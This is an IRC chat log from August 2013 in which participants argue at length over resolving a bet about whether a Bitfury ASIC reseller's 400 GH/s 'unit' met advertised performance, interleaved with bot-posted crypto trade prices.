22:45:38 so we are talking about this bet: Aug 31 22:45:41 yes Aug 31 22:45:41 "Bitfurystrikesback.com (Bitfury EU reseller) will ship their 25 and 400 gigahash mining units before 1st of September 2013. Devices must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W) in order to be accepted as valid. Atleast 5 deliveries confirmed by respected members of the community required." Aug 31 22:45:46 it says 400gh KIT includes 1 master board and 16 h-boards Aug 31 22:45:58 Tykling: yes Aug 31 22:46:00 tyrion70 Aug 31 22:46:04 which means it missed performance on hashrate -- it is not 400Gh Aug 31 22:46:12 they had to ship more hardware to make up for missed performance Aug 31 22:46:28 they had to add more hardware for the kit or unit or whatever you want to call it Aug 31 22:46:39 That picture that was posted shortly .. Aug 31 22:46:46 those were two " machines" right? Aug 31 22:47:04 or "units" ? Aug 31 22:47:06 tyrion70: 2 seperate UNITS, yes. Aug 31 22:47:13 one 400GH unit and one 25GH unit.. Aug 31 22:47:26 so single unit hit 400Gh. Aug 31 22:47:28 [HAVELOCK] [XBOND] 968 @ 0.00118 = 1.1422 BTC [-] Aug 31 22:47:45 tyrion70: http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ -- 400Gh unit -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised -- the hardware did not perform as advertised. The bet clearly states that the hardware must perform as advertised. All conditions of the bet were not met. Aug 31 22:47:58 it says 400 gh kit includes 1 m-board and 16 h-boards Aug 31 22:48:03 it doesn't talk about units there Aug 31 22:48:10 Thats not what the bet says. Aug 31 22:48:14 when the bet says "unit" it means the 400gh kit Aug 31 22:48:25 The bet doesn't mention anything on number of boards fractal.. Aug 31 22:48:25 Well, tahts too bad isn't it? because it SAYS UNIT!!!!!!!!!!! Aug 31 22:48:33 there's no such thing as 400gh unit = 1 m-board + 16 h-boards Aug 31 22:48:37 yes there is Aug 31 22:48:40 but there is not Aug 31 22:48:54 it's a fact that 1 m-board can hold up to 16 h-boards, but that doesn't make it a 400gh unit Aug 31 22:49:05 tyrion70: yes it does . the bet says 'as advertised' . the hardware is http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ -- 400Gh unit -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised Aug 31 22:49:16 it was advertised that 400gh KIT includes a m-board + 16 h-boards.... nothing about "units" Aug 31 22:49:25 it says PERFORMANCE as advertised Aug 31 22:49:28 fractal: that link nor the content is included in the bet.. Aug 31 22:49:29 The advertised performance was 400Gh on ""1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips"" Aug 31 22:49:31 400gh UNIT PERFORMANCE AS advertised Aug 31 22:49:45 tyrion70: yes, it says bitfurystrikesback.com in the bet Aug 31 22:49:55 so, the advertised performance is from that site Aug 31 22:50:04 the advertised performance from the site: Aug 31 22:50:11 Performance: Aug 31 22:50:11 400GHash/s Aug 31 22:50:11 Total power draw max. 400W (Efficiency at wall depends on your PSU) Aug 31 22:50:13 fractal, thats not the site, its the company.. Aug 31 22:50:24 The advertised performance was 400Gh on ""1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips"" Aug 31 22:50:34 they failed to meet these performance targets Aug 31 22:50:47 no, the unit advertised performance was 400gh and 1 m-board and 16 h-boards was the promised amount of modular cards that make the unit Aug 31 22:50:49 fractal, would you agree that it would be weird that ppl who bet need to read another site? Aug 31 22:50:53 but they failed the hardware amount Aug 31 22:50:56 but the performance did not fail Aug 31 22:51:10 [BTCTC] [PETA-MINE] 4 @ 0.6498 = 2.5992 BTC [+] Aug 31 22:51:17 [MPEX] [S.MPOE] 3600 @ 0.00087455 = 3.1484 BTC [+] Aug 31 22:51:28 _and_ performance means that W/GH is as promised Aug 31 22:51:29 tyrion70: Weird or not -- Thats what the bet says -- Bitfurystrikesback.com (Bitfury EU reseller)" Aug 31 22:51:40 Anduck: Thats not what the bet says Aug 31 22:51:44 the bet doesn't talk about h-cards performances, it talks about the whole unit performances Aug 31 22:51:53 the whole unit works as promised Aug 31 22:52:03 except it has more h-cards in it than promised Aug 31 22:52:05 And it missed performance for the unit, which is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 22:52:13 [BTCTC] [PETA-MINE] 160 @ 0.65 = 104 BTC [+] Aug 31 22:52:17 which means the bet is a no, because all conditions of the bet were not met. Aug 31 22:52:37 bfsb.com says that 400gh kit includes that amount of modular cards, yes Aug 31 22:53:03 hmm.. i bet the bitfury argument loop will still last a few hours.. Aug 31 22:53:04 and they failed that but the overall performance of the whole 400gh unit/kit is as advertised Aug 31 22:53:08 yup Aug 31 22:53:08 And since the hardware didn't perform as advertised -- the bet is a no. Aug 31 22:53:24 the unit does, they didn't advertise that h-card must perform 25gh Aug 31 22:53:32 Anduck: Unforunately, thats not what the bet says. Aug 31 22:53:34 the bet is about units, not the modular h-cards or m-cards Aug 31 22:53:55 [BTCTC] [COGNITIVE] 1 @ 0.251 BTC [-] Aug 31 22:54:02 fractal: the bet doesn't say "as advertised on the website www.blabla" .. the bet specifies the exact conditions itself.. without a need to read some website.. Aug 31 22:54:08 well they can still argue after the bet is resolved Aug 31 22:54:10 And the 400Gh unit -- as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- did not meet performance targets Aug 31 22:54:13 the bet says: 25gh unit and 400gh unit must meet the advertised performance. they promise 400gh at 400W for the 400gh unit at bfsb.com. that is met. what's so weird about this? Aug 31 22:54:23 what if bitfury changed the site while the bet was running??? Aug 31 22:54:35 yeah that too Aug 31 22:54:40 tyrion70: it says as advertised . Unfortunately, that is where it was advertised. Aug 31 22:54:55 Then 'as advertised' would make it a bad bet... and it wouldn't have been accepted. Aug 31 22:54:57 it says: Aug 31 22:54:58 Devices must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W) in order to be accepted as valid. Aug 31 22:55:09 yeah Aug 31 22:55:11 tyrion70: yes. And the 400Gh unit -- as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- did not meet performance targets Aug 31 22:55:14 so the actual bet value is references within parenthesis.. Aug 31 22:55:24 tyrion70: what do you mean? Aug 31 22:55:39 oh Aug 31 22:55:40 yes Aug 31 22:55:47 I believe in general that a valid bet MUST contain all information needed.. Aug 31 22:56:02 in this case the bet was for performance.. which was included in parenthesis.. Aug 31 22:56:06 well the bet describes what means "advertised performance" Aug 31 22:56:10 yeah Aug 31 22:56:11 tyrion: Exactly, the 400Gh unit was only 365Gh . Aug 31 22:56:17 therefore it missed performance targets Aug 31 22:56:34 if I would have bought 1 unit.. how many GH would I have right now fractal? Aug 31 22:56:34 but the people who ordered 400gh unit got >400gh at promised watts? Aug 31 22:57:09 lets take another example.. Aug 31 22:57:41 tyrion70: Nobody who ordered a 400Gh unit has posted recieving more then 400Gh.... so I can't answer that question. Aug 31 22:57:52 fractal: actually, MXRider did Aug 31 22:57:56 Someone ordered a 400 + 25Gh, and got 2 M-cards. Aug 31 22:57:59 https://bitcointalk.org/index.php?topic=250249.msg3051503#msg3051503 Aug 31 22:58:01 the ordered 400gh unit and 25gh unit. Aug 31 22:58:01 he did.. Aug 31 22:58:02 Anduck: NO. he ordered 425. Aug 31 22:58:04 [ANN] Bitfury ASIC sales in EU and Europe Aug 31 22:58:10 and he got 499 gh in total Aug 31 22:58:11 exactly. Aug 31 22:58:17 thats my point. thank you. Aug 31 22:58:35 [BTCTC] [DMS.MINING] 4 @ 0.003376 = 0.0135 BTC [+] Aug 31 22:58:46 tyrion70: let us hear your example Aug 31 22:58:53 You won't see anyone with 400Gh only getting delivered -- because BSB would have to ship them 2 M-boards, 2 R-pi's, etc. Aug 31 22:59:04 and they do ship Aug 31 22:59:10 well that's what I asked earlier.. Aug 31 22:59:12 when one orders 400gh kit, he gets 400gh Aug 31 22:59:14 Since he ordered 400 + 25, he was always going to get 2 M-boards. Aug 31 22:59:22 ... Aug 31 22:59:22 Anduck: I agree with you. but thats not what the bet says Aug 31 22:59:43 The bet says the 400Gh unit -- as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" must be 400Gh. IT ISN'T Aug 31 22:59:46 if ppl ordering 400 gh get 2 m-boards its two units not one.. Aug 31 22:59:53 [BTCTC] [LABCOIN] 20 @ 0.00369 = 0.0738 BTC [+] Aug 31 23:00:08 tyrion70: Exactly. thank you. this is what i've been trying to argue for 3 days Aug 31 23:00:15 tyrion70: the 400gh kit itself is built from m-boards and h-boards Aug 31 23:00:35 Anduck: no, its not. As per the website - the 400Gh unit -- as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:00:40 anduck m-boards are not interconnected right? Aug 31 23:00:46 tyrion70: They are not . Aug 31 23:00:49 each m-board has own power supply, nic etc.. Aug 31 23:00:53 tyrion70: correct Aug 31 23:01:03 a full m-board _should_ make 400gh and now actually only does 370 gh. but the unit/kit, which people ordered, does 400gh (so it includes 2 m-boards and 18-20 h-boards) Aug 31 23:01:12 ahhh Aug 31 23:01:28 ok.. now I get the complete picture.. Aug 31 23:01:39 Anduck: which means the bet is a no, since the hardware does not perform as advertised. Aug 31 23:01:39 well that's a tough one.. Aug 31 23:02:07 I believe that ppl could have bet on this bet text with two things in mind.. Aug 31 23:02:09 so in my eyes they failed the _hardware amount promise_ , they had to deliver more of those modular cards to make the 400gh kit Aug 31 23:02:29 they did not fail the promised/advertised PERFORMANCE of the kit (and the bet was about the performance only) Aug 31 23:02:36 tyrion70: of course thats true. which is why its a bad bet i think... Aug 31 23:02:48 Someone could have thought: No way they get that GH/W out of one chip: I'm betting no Aug 31 23:02:49 Anduck: why do you keep using the word KIT? KIT is not in the bet langugage at all. KIT is irrelevant Aug 31 23:02:50 OR Aug 31 23:02:59 tyrion70: performance means W/GH Aug 31 23:03:09 fractal: they were sold as kits Aug 31 23:03:16 [BTCTC] [LABCOIN] 11 @ 0.00369 = 0.0406 BTC [+] Aug 31 23:03:17 400gh unit = 400 gh kit Aug 31 23:03:17 [BTCTC] [LABCOIN] 302 @ 0.00368 = 1.1114 BTC [-] Aug 31 23:03:18 [BTCTC] [LABCOIN] 100 @ 0.003663 = 0.3663 BTC [-] Aug 31 23:03:19 [BTCTC] [LABCOIN] 249 @ 0.00365 = 0.9089 BTC [-] Aug 31 23:03:25 No it doesn't. Performance means Hashrate and Wattage seperatly... No Proportion was mentioned in the bet language. Aug 31 23:03:42 25gh @ 40W an 400 gh @ 400W Aug 31 23:03:48 it must be BOTH over 400Gh and under 400W to meet targets. Aug 31 23:03:52 Anduck, it's going to be hard to argue that one kit needs two psu's and two network cables.. Aug 31 23:04:00 well, a 400Gh UNIT does not exist..... Aug 31 23:04:01 it doesn't need 2 psu-s... Aug 31 23:04:20 fractal: indeed. so one must have understood that when talking about 400gh unit it means the 400gh KIT you can order from the site Aug 31 23:04:23 It needs 2 m-boards, 2 R-pi's, etc. Aug 31 23:04:30 Anduck: Thats not what the bet says. Aug 31 23:04:43 my conclusion if you want to hear it: bad bet... Aug 31 23:04:44 so that when they advertised that 400gh kit will do 400 gigahashes at <400W.. it is met Aug 31 23:04:51 The best doesnt say "If they miss performance targets, they can ship multiple units to make up for it" Aug 31 23:05:00 the outcome was not 100% coverered by the text in the bet.. Aug 31 23:05:11 but people got the promised performance? Aug 31 23:05:14 w tf Aug 31 23:05:15 Anduck: The 400Gh unit, as advertised, is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:05:22 the 400gh KIT was advertised as taht Aug 31 23:05:24 Which failed to meet performance targets Aug 31 23:05:27 no mention about units in there Aug 31 23:05:35 'KIT" is nowhere in the bet language. stop using it. thank you. Aug 31 23:05:41 anduck: 400 GH/s unit Aug 31 23:05:45 we are talking about UNITS, as per the bet language. Aug 31 23:05:48 the KIT now happened to include more m-boards than it advertised but the PERFORMANCE is still as promised!!!!!!!! Aug 31 23:06:01 fractal: but there's no such thing as unit at the bfsb.com shop Aug 31 23:06:03 Anduck: KIT is nowhere in the bet language. It means something different to UNIT. sorry. Aug 31 23:06:05 it says unit anduck not kit.. Aug 31 23:06:18 that's why its a bad bet.. Aug 31 23:06:23 tyrion70: http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Aug 31 23:06:25 it's not a no, and not a yet.. Aug 31 23:06:29 where the fuck it says "unit" in there? Aug 31 23:06:32 Well, the FULL KIT is STILL "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:06:43 you have to be really retarted not to read that part "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:06:47 thats a KIT Aug 31 23:06:50 Anduck like I said, I have to go on the text in the bet.. Aug 31 23:06:52 the bet wasn't about what the full kit is, it was about that the full kit will deliver the performance Aug 31 23:06:59 not the site.. the site can be changed.. the bet can't Aug 31 23:07:11 Anduck: IT doesn't matter what you say now.... THE BET LANGUAGE IS ALL THAT MATTERS Aug 31 23:07:15 holy SHIT MAN Aug 31 23:07:19 and i think it was quite clear to understand that 25gh unit and 400gh unit meant the thing you can buy from the website. and the thing you can buy from the website is kit Aug 31 23:07:47 nobody has declared that 1 m-board + 16 h-boards is 400gh unit Aug 31 23:08:01 anduck what's the power usage on that thing anyway? Aug 31 23:08:06 Well obviously its not clear.... a 400Gh unit/kit was "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:08:07 the only declaration for 400gh unit i can think of is that what they sell at the site. the 400 gh KIT is what they sell Aug 31 23:08:21 Anduck: thats not what the bet says. Aug 31 23:08:26 tyrion70: <350W Aug 31 23:08:33 [HAVELOCK] [SMG] 389 @ 0.00022 = 0.0856 BTC [-] Aug 31 23:08:35 You can't write a bet and they say "oh, I actually meant this" later Aug 31 23:08:48 yeah but it's actually very much the only way you can understand the bet Aug 31 23:08:52 for 1 m-board with 16 h-boards? Aug 31 23:08:59 tyrion70: no, for the 400gh unit Aug 31 23:09:02 or for 2 m-boards and 19-h boards? Aug 31 23:09:05 that includes 2 m-boards and 18 h-boards Aug 31 23:09:07 or 19 h-boards Aug 31 23:09:08 Anduck: everyone can see that a 400Gh unit is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:09:28 fractal: that was meant to be the 400gh kit. it was meant that 400gh kit only includes 1 m-board filled with h-boards Aug 31 23:09:34 but the kit hardware amount changed Aug 31 23:09:36 but the performance did not Aug 31 23:09:44 Anduck: And thats what was advertsied -- according to the bet language -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:09:51 This did not meet performance. Aug 31 23:10:09 It's like BFL shipping 2 singles because 1 was only 1/2 the hashrate Aug 31 23:10:12 pfff Aug 31 23:10:15 or giving a refund. Aug 31 23:10:21 fractal: theu can do that if they keep the performance promise Aug 31 23:10:25 The fact is that the hardware MISSED performance Aug 31 23:10:32 yeah Aug 31 23:10:34 it did Aug 31 23:10:37 but the 400gh unit did nopt Aug 31 23:10:39 [HAVELOCK] [SMG] 400 @ 0.0002102 = 0.0841 BTC [-] Aug 31 23:10:41 nor did the 25gh Aug 31 23:11:01 Anduck: the bet says nothing about keeping promises and shipping more hardware if they miss performance numebrs, it simply says that the 400Gh unit, as advertised "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips", must be 400Gh... IT was not. Aug 31 23:11:31 but there's no declaration for 400gh unit to be 1 m-board with 16 h-boards Aug 31 23:11:32 ......... Aug 31 23:11:45 Yes, that is what was advertised. Aug 31 23:11:47 o well there is Aug 31 23:11:48 yeah Aug 31 23:11:50 the kit Aug 31 23:11:58 or unit, whatever we want to call it Aug 31 23:12:06 but as long as it performs as promised, the bet is yes Aug 31 23:12:07 right? Aug 31 23:12:17 doesn't matter does the COLOR of the miner change Aug 31 23:12:18 So, how do you expect people to read the bet, -- AS adveritsed -- ?? and then tell them later 'Sorry, it doesn't matter if that was as advertised' Aug 31 23:12:19 or the SIZE Aug 31 23:12:28 Thats not what the language of the bet says. Aug 31 23:12:33 well i am asking you Aug 31 23:12:48 it can be read and understood two ways without right or wrong.. Aug 31 23:12:53 The UNIT, as advertised, didn't perform as promised . Aug 31 23:12:56 hence: bad bet Aug 31 23:13:05 fractal: what is the unit? Aug 31 23:13:36 Anduck: "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips", Aug 31 23:13:47 yeah, they failed that. they had to add more hardware to make the unit Aug 31 23:13:47 both anduck and fractal, try not to convince eachother of your own opinion but see if you can fit both opinions in the same bet.. Aug 31 23:13:54 indeed Aug 31 23:14:03 what i said earlier, i say now Aug 31 23:14:15 the bet requires that bfsb ships 400 gh to people who ordered 400gh Aug 31 23:14:21 and it must meet the W/GH Aug 31 23:14:22 tyrion70: i agree with you, your arguement that this is a bad bet, is probably valid. Aug 31 23:14:25 you are both right... Aug 31 23:14:26 so they cant ship for example GPU's Aug 31 23:14:39 Anduck: Thats not what the bet says. Aug 31 23:14:55 anduck, I could argue that if I ordered a 400GH Kit as you describe it, I now received 2 units... Aug 31 23:15:05 not one... Aug 31 23:15:06 it doesn't matter that does the miner change color or what sized it is... the thing is that they had to deliver the advertised performance. performance means X amount of GHash at Y W/GH. Aug 31 23:15:18 Anduck: yes, but thats not what the bet says. Aug 31 23:15:22 tyrion70: you can only order 400gh kits Aug 31 23:15:28 [BTCTC] [LABCOIN] 2 @ 0.0037 = 0.0074 BTC [+] Aug 31 23:15:42 Anduck: And a KIT, as advertised is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips", Aug 31 23:15:43 they said that the kit will include 1 m-board and 16 h-boards. but it ended up including 2 m-boards with 19 h-boards Aug 31 23:15:45 anduck; do you agree that I should not have to read another website to bet? Aug 31 23:15:51 tyrion70: yes Aug 31 23:15:55 allrightl Aug 31 23:16:06 so where does one come up with that a 400gh unit is 1 m-board with 16 h-boards??? Aug 31 23:16:27 anduck: do you agree that if I ordered a 400 GH Kit from bitfury and I openend the box I would see two "units" Aug 31 23:16:27 thats not in the bet. the bet refers to the bfsb.com shop declared performance of 400gh unit. and it's in the parenthesis too Aug 31 23:16:32 Anduck: The bet language says UNIT. The website says "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips", Aug 31 23:16:35 in the parenthesis is the thing that the 400gh unit and 25gh unit had to meet Aug 31 23:16:40 depening on "my understanding" of the word unit... Aug 31 23:16:40 1 master board is therefore assumed to be a UNIT Aug 31 23:16:45 tyrion70: yea Aug 31 23:17:04 tyrion70: that means they failed the amount of hardware you ordered. Aug 31 23:17:10 but it still performs as promised Aug 31 23:17:18 it means that the text is ambivalent.. Aug 31 23:17:19 even though the miner size or color or amount of modular units has changed Aug 31 23:17:38 Well, i'd say that if they had to ship more hardware -- they missed performance targets. Aug 31 23:17:38 because 2 units makes the bet a no.. Aug 31 23:17:51 tyrion70: but where do you come up with that 400gh is 2 units? Aug 31 23:18:14 like I said if I opened the box today one could argue that I have received two units instead of one.. Aug 31 23:18:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.02271 = 0.0454 BTC [-] Aug 31 23:18:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.0227 = 0.0681 BTC [-] Aug 31 23:18:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.0227 = 0.227 BTC [-] Aug 31 23:18:25 it's a single 400gh unit you buy. you get the 400gh (even though it's splitted in 2 mainboards and 19 h-boards) Aug 31 23:18:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.02251 = 0.045 BTC [-] Aug 31 23:18:30 tyrion70: indeed Aug 31 23:18:35 so they failed that promise Aug 31 23:18:35 which would make me very happy customer nonetheless... Aug 31 23:18:43 [BTCTC] [TAT.ASICMINER] 53 @ 0.0225 = 1.1925 BTC [-] Aug 31 23:18:48 but those hardware as the unit would still perform as promised Aug 31 23:18:58 you order 400gh unit, you get 400 gh unit Aug 31 23:19:01 For the record -- nobody who ordered a 400Gh OR LESS has reported receiving more then 1 M-board. Aug 31 23:19:07 the unit has changed, but the performance hasn't Aug 31 23:19:13 Anduck: 2 units is not 1 unit. Aug 31 23:19:21 2 units is 2 units. because they missed performance. Aug 31 23:19:30 you order 400gh unit, how does that go to 2 units??? Aug 31 23:19:35 who the fuck says 1 m-board is 1 unit? Aug 31 23:19:47 who the fuck says 1 m-board with 16 h-boards is 1 unit? Aug 31 23:19:50 The website says it. ""1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips", Aug 31 23:19:56 thanks. Aug 31 23:19:56 it says that yes Aug 31 23:20:07 but the bet says: 400 GH/s unit 400W while it does 400 GH/s 2 units 400W Aug 31 23:20:07 1 kit now equals 2 units Aug 31 23:20:07 bet language was not clear (should have used the exact language from bitfury) Aug 31 23:20:13 YES you are RIGHT about that. so they failed that. the unit is MORE THAN 1 M-BOARD Aug 31 23:20:29 Anduck: YES, but thats not what the bet says !! Aug 31 23:20:31 there is no bitfury "unit" therefore ppl betting might have different opinions on what a unit is.. Aug 31 23:20:33 the unit is MORE than 1 m-board with 16 h-boards!!! Aug 31 23:20:44 Anduck: That's not what was advertised Aug 31 23:20:51 true! Aug 31 23:20:51 Anduck: The BET says 'as advertised' Aug 31 23:20:55 but the performance is still correct! Aug 31 23:21:14 it wasn't about how much boards the unit must have or is the hardware amount as advertised Aug 31 23:21:15 No, its not. The 400Gh unit , as advertised "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips", is only 365Gh Aug 31 23:21:27 Again, Anduck, Thats not what the bet says.... Aug 31 23:21:58 again, I could argue both sides; so I say it's invalid.. Aug 31 23:22:04 but the 400gh unit ended up to be 2 m-boards + 19 h-boards. so they fucking failed that hardware amount promise, RIGHT???? but the 400gh unit (which has now changed to 2 m-boards instead of 1) they ordered performs as promised Aug 31 23:22:25 Anduck: Thats irrelevant, as thats not what the bet says. Aug 31 23:22:27 ok Aug 31 23:22:34 lets try a different approach Aug 31 23:22:36 it's irrelevant? Aug 31 23:22:37 knc.. Aug 31 23:22:45 Anduck: All thats relevant is the language of the bet Aug 31 23:22:46 has 100 200 and 400 gh machines right? Aug 31 23:22:54 yup Aug 31 23:23:20 ok lets say the bet is knc delivers their "units" with advertized performance.. Aug 31 23:23:34 now they don't and instead of sending me one jupiter they send two... Aug 31 23:24:16 now if the bet says: a jupiter at advertized performance (400GH) the bet would be NO right? Aug 31 23:24:32 that would mean they failed on performance.... the bet would be a NO Aug 31 23:24:32 the bet says "400gh unit at 400W" ? * Aug 31 23:24:35 but if the bet says: an order at advertized performance (400GH) Aug 31 23:24:46 it would be a yes.. Aug 31 23:24:53 yup Aug 31 23:24:55 [BTCTC] [LABCOIN] 3 @ 0.0037 = 0.0111 BTC [+] Aug 31 23:25:01 ok.. now back to bitfury.. Aug 31 23:25:09 but the performance isn't same as hashrate Aug 31 23:25:14 Anduck: "400gh unit 400W" means that the unit must be BOTH more then 400Gh, and less then 400W... no mention of Gh/W ratio was made. Aug 31 23:25:18 performance is W/GH AND the hashrate Aug 31 23:25:27 yeah Aug 31 23:25:29 Anduck: not the way the bet defines it Aug 31 23:25:30 ho ho ho Aug 31 23:25:36 but that's what the performance means, right? Aug 31 23:25:37 =P Aug 31 23:25:40 keep it simple first.. Aug 31 23:25:48 skip the W ;) Aug 31 23:25:52 >400gh at <400W makes a rate of <1 W/GH Aug 31 23:25:53 [BTCTC] [ACTIVEMINING] 170 @ 0.004302 = 0.7313 BTC [-] Aug 31 23:26:04 + the unit must do more than 400 GH Aug 31 23:26:06 No. You can win on hashrate and lose on wattage, or win on wattage and lose on hashrate Aug 31 23:26:08 with bitfury.. when this bet was openend.. Aug 31 23:26:18 Anduck what was your understanding of a unit? Aug 31 23:26:32 the 400gh or 25gh thing you can order from bfsb.com Aug 31 23:26:35 they call them kits Aug 31 23:26:54 ok so the word unit was "wrong" from the start... Aug 31 23:26:59 how? Aug 31 23:27:12 well.. you read and interpreted the word unit as order or kit Aug 31 23:27:24 what do you think unit is? Aug 31 23:27:33 fractal might have read and interpreted 1m-board with 16 h-boards.. Aug 31 23:27:37 the thing is.. Aug 31 23:27:39 but who says unit is that? Aug 31 23:27:41 there is a difference.. Aug 31 23:27:44 bfsb.com says that the kit is that Aug 31 23:27:47 who says a unit is an order... Aug 31 23:27:56 well if he got that thing from the kit declaration Aug 31 23:28:01 thats exactly how I interpreted it -- based on the bet language -- thats all I have to go by... The site doesn't say "message Anduck" if you have any questions. Aug 31 23:28:02 then kit=unit=order Aug 31 23:28:19 that's ur assumption anduck.. Aug 31 23:28:22 why? Aug 31 23:28:31 well because you believe it to be... Aug 31 23:28:37 the question is not are you wrong.. Aug 31 23:28:39 isn't the assumption of 1 unit = 1 m-board + 16 h-board wrong too? it's never declared anywhere Aug 31 23:28:47 ha! Aug 31 23:28:51 there we go.. Aug 31 23:28:52 only the 400gh kit is declared Aug 31 23:28:58 both are actually... Aug 31 23:29:00 and none.. Aug 31 23:29:05 in the bet text itself Aug 31 23:29:11 unit is not further explained.. Aug 31 23:29:17 it leaves that to the reader.. Aug 31 23:29:17 so we _MUST_ assume that unit=kit Aug 31 23:29:20 nope.. Aug 31 23:29:26 unit can be a group Aug 31 23:29:33 unit can be a group of smaller units Aug 31 23:29:33 why? because you think that's correct? Aug 31 23:29:34 Anduck: well, it says 'As advertised' Aug 31 23:29:52 [BTCTC] [PETA-MINE] 8 @ 0.65 = 5.2 BTC [+] Aug 31 23:29:53 apparently there are two ways of looking at a unit.. Aug 31 23:29:59 yeah fractal, advertised performance. not advertised amount of hw Aug 31 23:30:01 both of which come from the same website.. Aug 31 23:30:14 [BTCTC] [PETA-MINE] 5 @ 0.65 = 3.25 BTC [+] Aug 31 23:30:16 [BTCTC] [PETA-MINE] 200 @ 0.65 = 130 BTC [+] Aug 31 23:30:19 the website only declares that a kit is 1 m-board + 16 h-boards Aug 31 23:30:25 no talking about units Aug 31 23:30:26 I could have read on the website that if I ordered a kit I would get 1 m board with 16 boards.. Aug 31 23:30:34 so you can -assume_ it means the kit when talking about unit Aug 31 23:31:02 ok u agree there can be two definitions of unit? Aug 31 23:31:19 yeah Aug 31 23:31:35 but my definition was actually defined ,the other one wasn't Aug 31 23:31:39 hense wrong bet language.. Aug 31 23:31:40 [BTCTC] [LABCOIN] 999 @ 0.0037 = 3.6963 BTC [+] Aug 31 23:31:40 Anduck: It missed advertised performance. Aug 31 23:31:40 [BTCTC] [LABCOIN] 291 @ 0.0037 = 1.0767 BTC [+] Aug 31 23:31:41 [BTCTC] [ASICMINER-PT] 2 @ 2.478 = 4.956 BTC [-] Aug 31 23:31:57 it has nothing to do with meeting the performance yet.. Aug 31 23:32:05 although.. Aug 31 23:32:23 if unit == kit == order then the bet result == yes Aug 31 23:32:34 wow Aug 31 23:32:36 if unit == 1m board + 16 h-boards then the bet result == no.. Aug 31 23:32:41 they failed to ship the kit as described, though the kit does deliver the performance as promised. nobody can say that unit = 1 m-board + 16 h-boards, that wasnt ever defined anywhere!!! Aug 31 23:32:44 [BTCTC] [DMS.MINING] 7 @ 0.003376 = 0.0236 BTC [+] Aug 31 23:32:46 tyrion70: I think its clear the bet language is not great. it its cancelled, i would understand, but I think it comes down to what most people would interpret a 'UNIT as Advertised' as being... Aug 31 23:32:47 you guys and this bet Aug 31 23:32:50 ... Aug 31 23:32:59 [BTCTC] [PETA-MINE] 8 @ 0.65 = 5.2 BTC [+] Aug 31 23:33:00 nobody can say that unit = 1 m-board + 16 h-boards, that wasnt ever defined anywhere!!! Aug 31 23:33:01 anduck, it was at the site wasn't it? Aug 31 23:33:04 no Aug 31 23:33:06 only kit declaration Aug 31 23:33:07 ;;ticker Aug 31 23:33:08 MtGox BTCUSD ticker | Best bid: 146.62507, Best ask: 146.63008, Bid-ask spread: 0.00501, Last trade: 146.62507, 24 hour volume: 24790.22348165, 24 hour low: 135.89000, 24 hour high: 147.98900, 24 hour vwap: 141.93176 Aug 31 23:33:26 it's very clear http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ -- 400Gh miner -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised -- the hardware did not perform as advertised. The bet clearly states that the hardware must perform as advertised. All conditions of the bet were not met. Aug 31 23:33:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008699 BTC [-] Aug 31 23:33:32 ok so kit was 1 m-board and 16 hbards right? Aug 31 23:33:36 yeah Aug 31 23:33:42 that how it was defined Aug 31 23:33:50 so if I were to read up on what a unit was I would think its a kit? Aug 31 23:34:01 and people who orderd the kit got the performance the kit promised Aug 31 23:34:05 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0008699 = 0.0017 BTC [-] Aug 31 23:34:15 ok but unit == kit OR unit == order.. Aug 31 23:34:17 it made it with a different hardware amount than promised. but that wasn't partt of the bet Aug 31 23:34:23 can't be both at the same time.. Aug 31 23:34:24 unit=kit Aug 31 23:34:31 order can have many kits Aug 31 23:34:42 unit==kit==1m+16h? Aug 31 23:34:56 the kit was advertised to make 400gh at <400W. and it was also advertised to have 1 m-board and 16 h-boards Aug 31 23:34:59 so yeah Aug 31 23:35:22 but the kit ended up to have more m-boards and h-boards than promised Aug 31 23:35:34 but it didn't alter the advertised performance (400gh at <400w) Aug 31 23:35:38 so it was unclear what a unit was... Aug 31 23:35:43 how is it unclear? Aug 31 23:35:53 well.. u bet from customer perspective.. Aug 31 23:36:10 if you get >400GH for <400W before september 1st you win.. Aug 31 23:36:17 I can bet from technical perspective.. Aug 31 23:36:34 being: no way they get 400GH out 